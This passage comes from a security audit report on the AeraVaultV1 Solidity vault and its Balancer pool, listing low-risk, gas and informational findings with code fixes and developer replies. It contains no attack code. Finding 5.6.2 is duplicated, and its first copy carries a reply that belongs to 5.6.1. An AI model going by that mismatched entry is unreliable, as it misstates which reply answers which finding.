        ...
        for (uint256 i = 0; i < amounts.length; i++) {
            if (amounts[i] > 0) {
                depositToken(tokens[i], amounts[i]);
                uint256 newBalance = holdings[i] + amounts[i];
                newWeights[i] = (weights[i] * newBalance) / holdings[i]; // would revert if holdings[i] == 0
            }
            ...
        }
        ...
    }

Similar divisions by 0 could occur in getWeightChangeRatio(), which is called from updateWeightsGradually(). If this is due to targetWeight being 0, then it is the desired result. The current weight should not be 0, due to Balancer's checks.

    function getWeightChangeRatio(uint256 weight, uint256 targetWeight) ... {
        return
            weight > targetWeight
                ? (ONE * weight) / targetWeight // could revert if targetWeight == 0
                : (ONE * targetWeight) / weight; // could revert if weight == 0
    }

Recommendation: Determine what should happen in the unlikely event that balances become 0 in deposit() and adapt the code if necessary. If it is relevant to return readable revert/error messages, then the division-by-0 situation could be intercepted and trigger a direct revert.
Gauntlet: The code should revert with 0 balances, since having 0 on either side of the AMM pool breaks spot prices and the ability to offer trades. Balancer does not allow a 0 weight, so this would be OK.

+5.4.7 Use ManagedPoolFactory instead of BaseManagedPoolFactory to deploy the Balancer pool
Severity: Low Risk
Context: AeraVaultV1.sol#L305-L321, AeraVaultV1Fork.ts#L219-L223
Description: Currently the Aera Vault uses BaseManagedPoolFactory as the factory to deploy the Balancer pool, while Balancer's documentation recommends and encourages the usage of ManagedPoolFactory. Quoting the doc inside the BaseManagedPoolFactory:

    This is a base factory designed to be called from other factories to deploy a ManagedPool with a particular controller/owner. It should NOT be used directly to deploy ManagedPools without controllers. ManagedPools controlled by EOAs would be very dangerous for LPs. There are no restrictions on what the managers can do, so a malicious manager could easily manipulate prices and drain the pool. In this design, other controller-specific factories will deploy a pool controller, then call this factory to deploy the pool, passing in the controller as the owner.

Recommendation: Use ManagedPoolFactory instead of BaseManagedPoolFactory to deploy the Balancer pool, following Balancer's best practices.
Gauntlet: Solved in PR #141.
Spearbit: Acknowledged.

+5.4.8 Adopt the two-step ownership transfer pattern
Severity: Low Risk
Context: AeraVaultV1.sol#L762-L764, Ownable.sol#L61-L64
Description: To prevent the Aera vault Owner, i.e. the Treasury, from calling renounceOwnership() and effectively breaking vault-critical functions such as withdraw() and finalize(), the renounceOwnership() function is explicitly overridden to always revert. However, the transferOwnership() function may lead to the same issue if ownership is transferred to an uncontrollable address because of human error or an attack on the Treasury.
Recommendation: Adopt the two-step ownership transfer pattern: (1) the owner sets the new owner, and (2) the new owner accepts the ownership.
Gauntlet: Solved in PR #132.
Spearbit: Acknowledged.
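A minimal sketch of the pattern; it assumes an OpenZeppelin 4.4+ Ownable (where _transferOwnership is internal), and later OpenZeppelin releases ship the same idea as Ownable2Step:

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    import "@openzeppelin/contracts/access/Ownable.sol";

    // Sketch of two-step ownership transfer on top of OZ 4.x Ownable.
    contract TwoStepOwnableSketch is Ownable {
        error NotPendingOwner();

        address public pendingOwner;

        // Step 1: the current owner nominates; nothing changes yet.
        function transferOwnership(address newOwner) public override onlyOwner {
            pendingOwner = newOwner;
        }

        // Step 2: only the nominee can complete the transfer, so ownership
        // can never land on an address nobody controls.
        function acceptOwnership() external {
            if (msg.sender != pendingOwner) revert NotPendingOwner();
            pendingOwner = address(0);
            _transferOwnership(msg.sender);
        }
    }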
+5.4.9 Implement zero-address check for manager_
Severity: Low Risk
Context: AeraVaultV1.sol#L267
Description: There is no zero-address check inside the constructor for the manager_ parameter. If manager_ is the zero address, then calls to calculateAndDistributeManagerFees will burn tokens (transfer them to address(0)).
Recommendation: Implement a zero-address check for the manager_ user input. Example:

    require(manager_ != address(0), "manager_: zero address");

Gauntlet: Fix implemented in PR #101.
Spearbit: Acknowledged.

5.5 Gas Optimization

+5.5.1 Simplify tracking of managerFeeIndex
Severity: Gas Optimization
Context: AeraVaultV1.sol#L769-L774, AeraVaultV1.sol#L794-L822, AeraVaultV1.sol#L70
Description: The calculateAndDistributeManagerFees() function uses updateManagerFeeIndex() to keep track of management fees. It keeps track of both managerFeeIndex and lastFeeCheckpoint in storage variables (costing SLOAD/SSTORE). However, because managementFee is immutable, this can be simplified to one storage variable, saving gas and improving code legibility.

    uint256 public immutable managementFee; // can't be changed

    function calculateAndDistributeManagerFees() internal {
        updateManagerFeeIndex();
        ...
        if (managerFeeIndex == 0) {
            return;
        }
        ... // use managerFeeIndex
        managerFeeIndex = 0;
        ...
    }

    function updateManagerFeeIndex() internal {
        managerFeeIndex += (block.timestamp - lastFeeCheckpoint) * managementFee;
        lastFeeCheckpoint = block.timestamp.toUint64();
    }

Recommendation: Consider changing the code as follows:

    function calculateAndDistributeManagerFees() internal {
        if (block.timestamp <= lastFeeCheckpoint) {
            return;
        }
        if (managementFee == 0) {
            return;
        }
        // managerFeeIndex is a local variable now
        uint256 managerFeeIndex = (block.timestamp - lastFeeCheckpoint) * managementFee;
        lastFeeCheckpoint = block.timestamp;
        ... // use managerFeeIndex
    }

Remove the updateManagerFeeIndex() function.
Spearbit: Partly solved in PR #145, with a few attention points:
• managerFeeIndex could be a local variable to save gas (no need to store it between calls).
• In case managementFee happens to be 0, gas is wasted (the recommendation above has been updated accordingly).

+5.5.2 Directly call getTokensData() from returnFunds()
Severity: Gas Optimization
Context: AeraVaultV1.sol#L899-L910, AeraVaultV1.sol#L700-L708, AeraVaultV1.sol#L728-L749
Description: The function returnFunds() calls getHoldings() and getTokens(). Both functions call getTokensData(), thus wasting gas unnecessarily.

    function returnFunds() internal returns (uint256[] memory amounts) {
        uint256[] memory holdings = getHoldings();
        IERC20[] memory tokens = getTokens();
        ...
    }

    function getHoldings() public view override returns (uint256[] memory amounts) {
        (, amounts, ) = getTokensData();
    }

    function getTokens() public view override returns (IERC20[] memory tokens) {
        (tokens, , ) = getTokensData();
    }

Recommendation: Call getTokensData() directly from returnFunds().
Gauntlet: Solved in PR #100.
Spearbit: Acknowledged.
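The recommended change, sketched as a diff against the getter signatures shown above:

    function returnFunds() internal returns (uint256[] memory amounts) {
    -   uint256[] memory holdings = getHoldings();
    -   IERC20[] memory tokens = getTokens();
    +   (IERC20[] memory tokens, uint256[] memory holdings, ) = getTokensData(); // one call instead of two
        ...
    }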
+5.5.3 Change uint32 and uint64 to uint256
Severity: Gas Optimization
Context: AeraVaultV1.sol#L63-L88, AeraVaultV1.sol#L769-L774
Description: The contract contains a few variables/constants that are smaller than uint256: noticePeriod, noticeTimeoutAt and lastFeeCheckpoint. This doesn't actually save gas, because they are not part of a struct and each still takes up a full storage slot. It even costs more gas, because additional bits have to be stripped off. Additionally, there is a very small risk of lastFeeCheckpoint wrapping to 0 in the updateManagerFeeIndex() function; if that happened, managerFeeIndex would get far too large and too many fees would be paid out. Finally, using uint256 simplifies the code.

    contract AeraVaultV1 is IAeraVaultV1, Ownable, ReentrancyGuard {
        ...
        uint32 public immutable noticePeriod;
        ...
        uint64 public noticeTimeoutAt;
        ...
        uint64 public lastFeeCheckpoint = type(uint64).max;
        ...
    }

    function updateManagerFeeIndex() internal {
        // could get large when lastFeeCheckpoint wraps
        managerFeeIndex += (block.timestamp - lastFeeCheckpoint) * managementFee;
        lastFeeCheckpoint = block.timestamp.toUint64();
    }

Recommendation:
• Replace uint32 and uint64 with uint256.
• Remove the conversion functions toUint64().
• Remove import "./dependencies/openzeppelin/SafeCast.sol";
• Remove using SafeCast for uint256;

+5.5.4 Use block.timestamp directly instead of assigning it to a temporary variable
Severity: Gas Optimization
Context: AeraVaultV1.sol#L883, AeraVaultV1.sol#L580
Description: It is preferable to use block.timestamp directly in the code instead of assigning it to a temporary variable, as reading it only costs 2 gas.
Recommendation: Use block.timestamp directly. Example:

    -   uint256 timestamp = block.timestamp;
    -   pool.updateWeightsGradually(timestamp, timestamp, weights);
    +   pool.updateWeightsGradually(block.timestamp, block.timestamp, weights);

Gauntlet: Solved in PR #102.
Spearbit: Acknowledged.

+5.5.5 Consider replacing pool.getPoolId() with bytes32 public immutable poolId to save gas and external calls
Severity: Gas Optimization
Context: AeraVaultV1.sol#L394, AeraVaultV1.sol#L723-L725, AeraVaultV1.sol#L738, AeraVaultV1.sol#L855
Description: The current implementation of the Aera Vault always calls pool.getPoolId(), directly or indirectly via getPoolId(), to retrieve the ID of the immutable state variable pool that is set at construction time. pool.getPoolId() is a getter function defined in the Balancer BasePool contract:

    function getPoolId() public view override returns (bytes32) {
        return _poolId;
    }

Inside the same BasePool contract, _poolId is defined as immutable, which means that after creating a pool it will never change. For this reason it is possible to apply the same logic inside the Aera Vault and use an immutable variable, avoiding external calls and saving gas.
Recommendation: Consider the following suggestions:
• Initialize an immutable variable with the poolId value after deploying the Balancer pool.
• Delete all references to getPoolId() and pool.getPoolId().
• Replace those references with a direct read of the immutable poolId.

    +   bytes32 private immutable poolId;

        constructor( ... ) {
            ...
            pool = IBManagedPool(
                IBManagedPoolFactory(factory).create(
                    IBManagedPoolFactory.NewPoolParams({ ... })
                )
            );
    +       poolId = pool.getPoolId();
            ...
        }

Gauntlet: Fix has been implemented in PR #123.
Spearbit: Acknowledged.

+5.5.6 Save values in temporary variables
Severity: Gas Optimization
Context: AeraVaultV1.sol#L301, AeraVaultV1.sol#L382, AeraVaultV1.sol#L427, AeraVaultV1.sol#L481, AeraVaultV1.sol#L495, AeraVaultV1.sol#L620, AeraVaultV1.sol#L652, AeraVaultV1.sol#L808, AeraVaultV1.sol#L816, AeraVaultV1.sol#L858, AeraVaultV1.sol#L876, AeraVaultV1.sol#L906
Description: We observed multiple occurrences in the codebase where .length is used in for loops. This leads to more gas consumption, because .length is evaluated repeatedly until the for loop finishes. When indexed variables are used multiple times inside a loop in a read-only way, they can also be stored in a temporary variable to save some gas.

    for (uint256 i = 0; i < tokens.length; i++) { // tokens.length has to be evaluated repeatedly
        ...
        ... = tokens[i].balanceOf(...); // tokens[i] has to be evaluated multiple times
        tokens[i].safeTransfer(owner(), ...);
    }

Recommendation: The value of .length can be saved in a temporary variable to save some gas.
Also, [i] can be saved in a temporary variable, provided it is used in a read-only way. Example:

    uint256 length = tokens.length; // temporary variable
    for (uint256 i = 0; i < length; i++) {
        IERC20 tmpToken = tokens[i]; // temporary variable
        ...
        ... = tmpToken.balanceOf(...);
        tmpToken.safeTransfer(owner(), ...);
    }

Gauntlet: Solved in PR #100.
Spearbit: Acknowledged.

5.6 Informational

+5.6.1 Aera could be prone to out-of-gas transaction reverts when managing a high number of tokens
Severity: Informational
Context: AeraVaultV1.sol#L350-L399, AeraVaultV1.sol#L402-L453, AeraVaultV1.sol#L456-L514, AeraVaultV1.sol#L531-L541
Description: The Balancer ManagedPool used by Aera has a maximum limit of 50 tokens. Functions like initialDeposit(), deposit(), withdraw() and finalize() involve numerous direct and indirect external calls (the latter made by Balancer itself when called by Aera) and math calculations that are done for each token managed by the pool. The deposit() and withdraw() functions are especially gas intensive, given that they also internally call calculateAndDistributeManagerFees(), which will transfer a management fee to the manager for each token. For these reasons, Aera should be aware that a high number of tokens managed by the Aera Vault could lead to out-of-gas reverts (the max block size depends on which chain the project is deployed to).
Recommendation: Consider the following suggestions:
• Monitor and test the gas consumption of those functions, simulating a managed pool that handles the max number of tokens allowed by Balancer's ManagedPool.
• Consider adding a custom max limit on the number of tokens supported by the AeraPool.
• Consider applying the suggestions reported in the issue "Malicious manager could cause Vault funds to be inaccessible".
• Consider the max block size currently available for the chains on which the project will be deployed.
Gauntlet: We are starting with 2 tokens for V1 and only gradually increasing. We will be incorporating the suggestions in "Malicious manager could cause Vault funds to be inaccessible".

+5.6.2 Use a consistent way to call getNormalizedWeights()
Severity: Informational
Context: AeraVaultV1.sol
Description: The functions deposit() and withdraw() call getNormalizedWeights(), while the functions updateWeightsGradually() and cancelWeightUpdates() call pool.getNormalizedWeights(). Although this is functionally the same, it is not consistent.
Gauntlet: We are starting with 2 tokens for V1 and only gradually increasing. We will be incorporating the suggestions in "Malicious manager could result in inaccessible funds of the Vault".

+5.6.2 Use a consistent way to call getNormalizedWeights()
Severity: Informational
Context: AeraVaultV1.sol
Description: The functions deposit() and withdraw() call getNormalizedWeights(), while the functions updateWeightsGradually() and cancelWeightUpdates() call pool.getNormalizedWeights(). Although this is functionally the same, it is not consistent.

function deposit(uint256[] calldata amounts) ... {
    ...
    uint256[] memory weights = getNormalizedWeights();
    ...
    emit Deposit(amounts, getNormalizedWeights());
}

function withdraw(uint256[] calldata amounts) ... {
    ...
    uint256[] memory weights = getNormalizedWeights();
    ...
    emit Withdraw(amounts, allowances, getNormalizedWeights());
}

function updateWeightsGradually(...) ... {
    ...
    uint256[] memory weights = pool.getNormalizedWeights();
    ...
}

function cancelWeightUpdates() ... {
    ...
    uint256[] memory weights = pool.getNormalizedWeights();
    ...
}

function getNormalizedWeights() ... {
    return pool.getNormalizedWeights();
}

Recommendation: Consistently use either getNormalizedWeights() or pool.getNormalizedWeights().
Gauntlet: Fixed in PR #137.
Spearbit: Acknowledged.

+5.6.3 Add function disableTrading() to IManagerAPI.sol
Severity: Informational
Context: AeraVaultV1.sol#L347-L596, IManagerAPI.sol
Description: The disableTrading() function can also be called by managers because of the onlyOwnerOrManager modifier. However, in AeraVaultV1.sol it is located in the PROTOCOL API section. It is also not present in IManagerAPI.sol.

contract AeraVaultV1 is IAeraVaultV1, Ownable, ReentrancyGuard {
    /// PROTOCOL API ///
    function disableTrading() ... onlyOwnerOrManager ... {
        ...
    }
    /// MANAGER API ///
}

// disableTrading() isn't present
interface IManagerAPI {
    function updateWeightsGradually(...) external;
    function cancelWeightUpdates() external;
    function setSwapFee(uint256 newSwapFee) external;
    function claimManagerFees() external;
}

Recommendation: Update the comments in AeraVaultV1.sol. Add disableTrading() to IManagerAPI.sol.

+5.6.4 Double-check the layout of functions
Severity: Informational
Context: AeraVaultV1.sol
Description: Different ways are used to lay out functions. Especially the part between ( ... ) and between ) ... { is sometimes put on one line and sometimes split over multiple lines. Also, { is sometimes at the end of a line and sometimes at the beginning. Although the layout is not disturbing, it might be useful to double-check it. Here are a few examples of different layouts:

function updateWeights(uint256[] memory weights, uint256 weightSum) internal ... {
}

function depositToken(IERC20 token, uint256 amount) internal {
    ...
}

function updatePoolBalance(
    uint256[] memory amounts,
    IBVault.PoolBalanceOpKind kind
) internal {
    ...
}

function updateWeightsGradually(
    uint256[] calldata targetWeights,
    uint256 startTime,
    uint256 endTime
) external override onlyManager whenInitialized whenNotFinalizing {
    ...
}

function getWeightChangeRatio(uint256 weight, uint256 targetWeight)
    internal
    pure
    returns (uint256)
{
}
...

Recommendation: Double-check the layout rules for functions.
Gauntlet: We use Prettier for code formatting and this issue is related to the tool itself. I believe the formatting here is consistent, as lines get broken up when they get too long rather than arbitrarily.
Spearbit: Acknowledged.

+5.6.5 Use Math library functions in a consistent way
Severity: Informational
Context: AeraVaultV1.sol#L24, AeraVaultV1.sol#L486, AeraVaultV1.sol#L605
Description: In the AeraVaultV1 contract, the OZ Math library functions are attached to the type uint256. The min function is used as a member function whereas the max function is used as a library function.
Recommendation: To maintain consistency, use Math.min at L486 or change L605 into the a.max(b) format. Note: using Math for uint256; can be removed if the Math.... pattern is used.
Gauntlet: Fixed in PR #111 and PR #139.
Spearbit: Acknowledged.

+5.6.6 Separation of concerns Owner and Manager
Severity: Informational
Context: AeraVaultV1.sol#L545-L556
Description: The Owner and Manager roles are separated on purpose. Role separation usually helps to improve quality. However, this separation can be broken if the Owner calls setManager(). This way the Owner can set the Manager to one of his own addresses, call Manager functions (for example setSwapFee()) and perhaps set it back to the original Manager afterwards. Note: as everything happens on chain, these actions can be tracked.
function setManager(address newManager) external override onlyOwner {
    if (newManager == address(0)) {
        revert Aera__ManagerIsZeroAddress();
    }
    if (initialized && noticeTimeoutAt == 0) {
        calculateAndDistributeManagerFees();
    }
    emit ManagerChanged(manager, newManager);
    manager = newManager;
}

Recommendation: Depending on the usefulness of separation of concerns, consider doing the following:
• Add require(newManager != owner()) to the setManager() function to prevent accidentally setting the Owner as the Manager (see the sketch below). Note: as discussed, this doesn't protect against the Owner deliberately creating a separate address and using that.
• Have a third role to set the Manager, possibly managed by a multisig.
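A minimal sketch of the first suggestion, applied to the function quoted above; the Aera__ManagerIsOwner error name is illustrative and not part of the current code:

function setManager(address newManager) external override onlyOwner {
    if (newManager == address(0)) {
        revert Aera__ManagerIsZeroAddress();
    }
    // hypothetical guard: the Owner should not (accidentally) appoint itself
    if (newManager == owner()) {
        revert Aera__ManagerIsOwner();
    }
    if (initialized && noticeTimeoutAt == 0) {
        calculateAndDistributeManagerFees();
    }
    emit ManagerChanged(manager, newManager);
    manager = newManager;
}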
Gauntlet: We think it's important for the treasury to have direct and immediate control over the manager, so we are not able to remove that power for V1. In future versions, this trust model may change.

+5.6.7 Add modifier whenInitialized to function finalize()
Severity: Informational
Context: AeraVaultV1.sol#L531-L541
Description: The function finalize() does not have the modifier whenInitialized, while most other functions do have this modifier. This does not create any real issues, because the function contains the check noticeTimeoutAt == 0, which can only be skipped after initiateFinalization(), and that function does have the whenInitialized modifier.

function finalize() external override nonReentrant onlyOwner { // no modifier whenInitialized
    if (noticeTimeoutAt == 0) { // can only be set via initiateFinalization()
        revert Aera__FinalizationNotInitialized();
    }
    ...
}

Recommendation: Add the whenInitialized modifier to function finalize().
Gauntlet: Fixed in PR #111.
Spearbit: Acknowledged.

+5.6.8 Document the use of mustAllowlistLPs
Severity: Informational
Context: AeraVaultV1.sol#L305-L323
Description: In the Aera Vault it is important that no other accounts can use joinPool() on the Balancer pool. If other accounts were able to call joinPool(), they would get Balancer Pool Tokens (BPT) which could rise in value once more funds are added to the pool. Luckily this is prevented by the mustAllowlistLPs parameter in NewPoolParams. Readers could easily overlook this parameter.

pool = IBManagedPool(
    IBManagedPoolFactory(factory).create(
        IBManagedPoolFactory.NewPoolParams({
            vault: IBVault(address(0)),
            name: name,
            symbol: symbol,
            tokens: tokens,
            normalizedWeights: weights,
            assetManagers: managers,
            swapFeePercentage: swapFeePercentage,
            pauseWindowDuration: 0,
            bufferPeriodDuration: 0,
            owner: address(this),
            swapEnabledOnStart: false,
            mustAllowlistLPs: true, // prevents other accounts from using joinPool
            managementSwapFeePercentage: 0
        })
    )
);

Recommendation: Add a comment showing the significance of the mustAllowlistLPs parameter.

+5.6.9 finalize can be called multiple times
Severity: Informational
Context: AeraVaultV1.sol#L531-L541
Description: The finalize function can be called multiple times, making it possible to waste gas for no reason and to emit a conceptually wrong Finalized event again. Currently there is no check that prevents calling the function multiple times, and there is no explicit flag that allows external sources (web app, external contract) to know whether the AeraVault has been finalized or not. Scenario: the AeraVault has already been finalized but the owner (which could be a contract and not a single EOA) is not aware of it. He calls finalize again, wastes gas because of the external calls in a loop done in returnFunds, and emits an additional event Finalized(owner(), [0, 0, ..., 0]) with an array of zeros in the amounts event parameter.
Recommendation: One simple change that could make the UX/DX much better would be a state variable that tracks whether the finalize function has already been called.

/// STORAGE SLOT START ///
+ /// @notice Indicates that the Vault has been finalized
+ bool public finalized;

function finalize() external override nonReentrant onlyOwner {
    if (noticeTimeoutAt == 0) {
        revert Aera__FinalizationNotInitialized();
    }
    if (noticeTimeoutAt > block.timestamp) {
        revert Aera__NoticeTimeoutNotElapsed(noticeTimeoutAt);
    }
+   finalized = true;
    uint256[] memory amounts = returnFunds();
    emit Finalized(owner(), amounts);
}

With the new finalized boolean, there are two possible solutions to the problem:
• Soft approach: finalized == true, combined with the fact that all the token balances in the Balancer pool are empty (equal to 0), implies that the AeraVault has already been finalized and funds have been withdrawn. This combined information can be used to let an external website/contract know that there is no reason to call finalize again.
• Hard approach: add an if (finalized) revert Aera__AlreadyFinalized(); check after the present checks, to revert in case the finalize function has already been called previously. Something important to keep in mind is that this would prevent the owner of the Vault from withdrawing funds in case something on the Balancer side has gone wrong (without reverting the transaction) and not all the remaining funds have been sent to the AeraVault.
Gauntlet: Let's go for the hard option. Implemented in PR #137.
Spearbit: Acknowledged. The "hard approach" has been implemented.

+5.6.10 Consider updating finalize to have a more "clean" final state for the AeraVault/Balancer pool
Severity: Informational
Context: AeraVaultV1.sol#L531-L541
Description: This is just a suggestion and not an issue per se. The finalize function should ensure that the pool is in a finalized state, for both a better UX and DX. Currently the finalize function only withdraws all the funds from the pool after a noticePeriod, but does not ensure that swaps have been disabled and that all the rewards the Vault (owned by the Treasury) is entitled to have been claimed.
Recommendation: Consider implementing the following actions to end up with a cleaner vault/pool state after executing finalize:
• claim remaining vault rewards and sweep them.
• disable swaps if not already disabled.
• Consider speaking with Balancer to understand the best practice to follow when a pool is being "retired". For example, should the LP tokens minted during the pool's initial deposit be burned, even if the Treasury/Vault will not be able to withdraw them because of issue "Sweep function should prevent the Treasury to withdraw pool's BPT"?

+5.6.11 enableTradingWithWeights is not emitting an event for pool's weight change
Severity: Informational
Context: AeraVaultV1.sol#L574-L583
Description: enableTradingWithWeights both changes the pool's weights and enables the swap feature, but it only emits the swap-related event (done by calling setSwapEnabled). Both of those operations should be correctly tracked via events so they can be monitored by external tools.
Recommendation: The best thing to do is to create a new event that specifically tracks this delicate operation, which is performed by the Treasury — a role that usually would not have the ability to update the pool's weights.

+ /// @notice Emitted when enableTradingWithWeights is called.
+ /// @param time timestamp of updates.
+ /// @param weights Target weights of tokens.
+ event EnabledTradingWithWeights(uint256 time, uint256[] weights);

function enableTradingWithWeights(uint256[] calldata weights)
    external
    override
    onlyOwner
    whenInitialized
{
    uint256 timestamp = block.timestamp;
    pool.updateWeightsGradually(timestamp, timestamp, weights);
-   setSwapEnabled(true);
+   pool.setSwapEnabled(true);
+   emit EnabledTradingWithWeights(timestamp, weights);
}

Gauntlet: Fixed in PR #126.
Spearbit: Acknowledged.

+5.6.12 Document Balancer checks
Severity: Informational
Context: AeraVaultV1.sol#L574-L583, ManagedPool.sol#L375-L387
Description: Balancer has a large number of internal checks. We've discussed the use of additional checks in the Aera Vault functions. The advantage of these is that they could result in more user-friendly error messages. Additionally, they protect against potential future changes in the Balancer code.

contract AeraVaultV1 is IAeraVaultV1, Ownable, ReentrancyGuard {
    function enableTradingWithWeights(uint256[] calldata weights) ... {
        ...
        // doesn't check weights.length
        pool.updateWeightsGradually(timestamp, timestamp, weights);
        ...
    }
}

Balancer code:

function updateWeightsGradually( ..., uint256[] memory endWeights) ... {
    (IERC20[] memory tokens, , ) = getVault().getPoolTokens(getPoolId());
    ...
    InputHelpers.ensureInputLengthMatch(tokens.length, endWeights.length); // length check is here
    ...
}

Recommendation: Consider documenting where the code relies on checks in Balancer. This makes reasoning about the correctness of the Aera Vault easier for Aera developers, auditors and users of the code.
Gauntlet: We reasoned that since Balancer has named errors it should be clear enough when those invariants are broken. This is a treasury product which people will interact with mainly through the UI.

+5.6.13 Rename FinalizationInitialized to FinalizationInitiated for code consistency
Severity: Informational
Context: AeraVaultV1.sol#L165, AeraVaultV1.sol#L207, AeraVaultV1.sol#L517
Description: The function at L517 was renamed from initializeFinalization to initiateFinalization to avoid confusion with the Aera vault initialization. For code consistency, the corresponding event and error names should be changed.
Recommendation: Rename the event at L165 to FinalizationInitiated, and the error at L207 to Aera__FinalizationNotInitiated.
Gauntlet: Fixed in PR #111.
Spearbit: Acknowledged.

+5.6.14 Consider enforcing an explicit check on token order to avoid human error
Severity: Informational
Context:
• AeraVaultV1.sol#L350
• AeraVaultV1.sol#L402
• AeraVaultV1.sol#L456
• AeraVaultV1.sol#L574
• AeraVaultV1.sol#L599-L603
Description: The Balancer protocol requires (and enforces during pool creation) that the pool's tokens are ordered by token address. The following functions accept a uint256[] of amounts or weights without knowing whether the order inside that array follows the same order as the tokens inside the Balancer pool.
• initialDeposit
• deposit
• withdraw
• enableTradingWithWeights
• updateWeightsGradually

While it is impossible to totally prevent human error (users could specify the correct token order but wrongly swap the input order of the amounts/weights), we could force the user to be more aware of the specific order in which the amounts/weights must be specified. A possible solution, applied to initialDeposit as an example, could be:

function initialDeposit(IERC20[] calldata tokensSorted, uint256[] calldata amounts)
    external
    override
    onlyOwner
{
    // ... other code

    IERC20[] memory tokens = getTokens();

    // check that the tokensSorted length also matches the length of the other arrays
    if (tokens.length != amounts.length || tokens.length != tokensSorted.length) {
        revert Aera__AmountLengthIsNotSame(
            tokens.length,
            amounts.length
        );
    }

    // ... other code

    for (uint256 i = 0; i < tokens.length; i++) {
        // check that the token position associated with the amount matches
        // the position of the token in the Balancer pool
        if (address(tokens[i]) != address(tokensSorted[i])) {
            revert Aera__TokenOrderIsNotSame(
                address(tokens[i]),
                address(tokensSorted[i]),
                i
            );
        }
        depositToken(tokens[i], amounts[i]);
    }

    // ... other code
}

Another possible implementation would be to introduce a custom struct

struct TokenAmount {
    IERC20 token;
    uint256 value;
}

update the function signature to function initialDeposit(TokenAmount[] calldata tokenWithAmount), and update the example code following the new parameter model. It is important to note that while this solution will not completely prevent human error, it will increase the gas consumption of each function.
Recommendation: Evaluate the possibility of reducing hypothetical human errors by enforcing a more explicit check on the token amounts/weights order when updating the pool, at the cost of increased gas consumption.
Gauntlet:
Spearbit:

+5.6.15 Swap is not enabled after initialDeposit execution
Severity: Informational
Context: AeraVaultV1.sol#L350-L399
Description: In the current deployment flow of the AeraVault, the Balancer pool is created (by the constructor) with swapEnabledOnStart set to false. When the pool receives its initial funds via initialDeposit, the pool still has the swap functionality disabled. It is not explicitly clear in the specification document and in the code when the swap functionality should be enabled. If the protocol wants to enable swaps as soon as the funds are deposited in the pool, it should call, after bVault.joinPool(...), setSwapEnabled(true) or enableTradingWithWeights(uint256[] calldata weights) in case the external spot price is not aligned (both functions will also trigger a SetSwapEnabled event).
Recommendation: Ensure setSwapEnabled(true) or enableTradingWithWeights(uint256[] calldata weights) is called at the end of initialDeposit if you intend to enable swapping after the pool has been funded.
Gauntlet: Suggestion has been implemented in PR #123.
Spearbit: Acknowledged. This behavior change should also be documented in both the high-level documentation and the natspec.

+5.6.16 Remove commented code and replace input values with Balancer enum
Severity: Informational
Context: AeraVaultV1.sol#L371-L380
Description: Inside the initialDeposit function there is some commented code (used as an example) that should be removed, for clarity and to avoid future confusion. The initUserData should not use direct input values (0 in this case) but the correct Balancer enum value, to avoid any possible confusion. Following the Balancer documentation (Encoding userData, JoinKind), the correct way to declare initUserData is to use the WeightedPoolUserData.JoinKind.INIT enum value, as sketched below.
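A minimal sketch of the corrected declaration, assuming Balancer's WeightedPoolUserData library is imported and that amounts holds the initial deposit amounts; the raw-value variant it replaces is paraphrased:

// instead of encoding the raw value 0:
// bytes memory initUserData = abi.encode(0, amounts);
bytes memory initUserData = abi.encode(
    WeightedPoolUserData.JoinKind.INIT, // self-documenting, encodes to the same uint256
    amounts
);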
Recommendation:
• Remove the code example comments.
• Update the code to use Balancer's enum value.
Gauntlet: Fixed in PR #102.
Spearbit: Acknowledged.

+5.6.17 The Created event is not including all the information used to deploy the Balancer pool and is missing indexed properties
Severity: Informational
Context: AeraVaultV1.sol#L95-L111, AeraVaultV1.sol#L334-L342
Description: The current Created event is defined as

event Created(
    address indexed factory,
    IERC20[] tokens,
    uint256[] weights,
    address manager,
    address validator,
    uint32 noticePeriod,
    string description
);

and is missing some of the information that is used to deploy the pool. To allow external tools to better monitor the deployment of the pools, it would be better to include all the information that has been used to deploy the pool on Balancer. The following information is currently missing from the event definition:
• name
• symbol
• managementFee
• swapFeePercentage
The event could also define both manager and validator as indexed event parameters to allow external tools to filter those events by those values.
Recommendation: We recommend to:
• Change manager and validator into indexed event parameters.
• Add the missing information to the event.

  event Created(
      address indexed factory,
+     string name,
+     string symbol,
      IERC20[] tokens,
      uint256[] weights,
+     uint256 swapFeePercentage,
-     address manager,
-     address validator,
+     address indexed manager,
+     address indexed validator,
      uint32 noticePeriod,
+     uint256 managementFee,
      string description
  );

• Update the event natspec comment to include documentation for the added event parameters.
• Update the emit Created event code to include the missing information.

  emit Created(
      factory,
+     name,
+     symbol,
      tokens,
      weights,
+     swapFeePercentage,
      manager_,
      validator_,
      noticePeriod_,
+     managementFee_,
      description_
  );

Gauntlet: Fixed in PR #101.
Spearbit: Acknowledged.

+5.6.18 Rename temp variable managers to assetManagers to avoid confusion and any potential future mistakes
Severity: Informational
Context: AeraVaultV1.sol#L300
Description: The managers declared in the linked code (see context) are in reality Asset Managers, which have a totally different role compared to the AeraVault Manager role. The Asset Manager is able to control the pool's balance, withdrawing from it or depositing into it. To avoid confusion and any potential future mistakes, it would be better to rename the temporary variable managers to a more appropriate name like assetManagers.

- address[] memory managers = new address[](tokens.length);
+ address[] memory assetManagers = new address[](tokens.length);
  for (uint256 i = 0; i < tokens.length; i++) {
-     managers[i] = address(this);
+     assetManagers[i] = address(this);
  }
  pool = IBManagedPool(
      IBManagedPoolFactory(factory).create(
          IBManagedPoolFactory.NewPoolParams({
              vault: IBVault(address(0)),
              name: name,
              symbol: symbol,
              tokens: tokens,
              normalizedWeights: weights,
-             assetManagers: managers,
+             assetManagers: assetManagers,
              swapFeePercentage: swapFeePercentage,
              pauseWindowDuration: 0,
              bufferPeriodDuration: 0,
              owner: address(this),
              swapEnabledOnStart: false,
              mustAllowlistLPs: true,
              managementSwapFeePercentage: 0
          })
      )
  );

Recommendation: Rename managers to assetManagers to avoid confusion and any potential future mistakes.
Gauntlet: Fixed in PR #123.
Spearbit: Acknowledged.
+5.6.19 Move description declaration inside the storage slot code block
Severity: Informational
Context: AeraVaultV1.sol#L72-L74
Description: In the current code, the description state variable is in the /// STORAGE /// block where all the immutable variables are grouped. As the dev comment says, a string cannot be immutable in bytecode and can only be set in the constructor, so it would be better to move it inside the /// STORAGE SLOT START /// block of variables that groups all the non-constant and non-immutable state variables.
Recommendation: Move the description state variable inside the /// STORAGE SLOT START /// code section.
Gauntlet: Fixed in PR #112.
Spearbit: Acknowledged.

+5.6.20 Remove unused imports from code
Severity: Informational
Context: AeraVaultV1.sol#L6
